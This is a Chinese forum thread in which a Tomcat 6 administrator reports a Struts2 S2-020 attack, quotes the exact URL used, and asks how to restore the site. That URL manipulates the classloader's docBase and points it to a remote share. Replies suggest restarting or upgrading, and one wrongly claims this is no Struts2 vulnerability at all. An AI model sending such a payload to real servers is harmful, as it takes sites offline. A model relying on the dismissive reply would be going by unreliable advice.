服务器被人利用Struts2 S-20漏洞攻击了,怎么恢复啊?
TOMCAT 6
被人执行了
http://127.0.0.1//HelloWorld.action?class.classLoader.resources.dirContext.docBase=//11.11.11.11/test
然后指向了一个不存在的共享目录,导致现在访问网站都是提示404错误
怎么恢复啊? 急求啊!
------解决方案--------------------你这什么漏洞攻击啊,struts2只有在启用动态方法调用的情况下才会有使用ognl漏洞攻击的。你这个根本就是普通的传参,是你自己action中的问题
------解决方案--------------------
重启不行么?
------解决方案--------------------升级sturts2.看看官方的解决方案
------解决方案--------------------丢弃掉这东东算了,到处是漏洞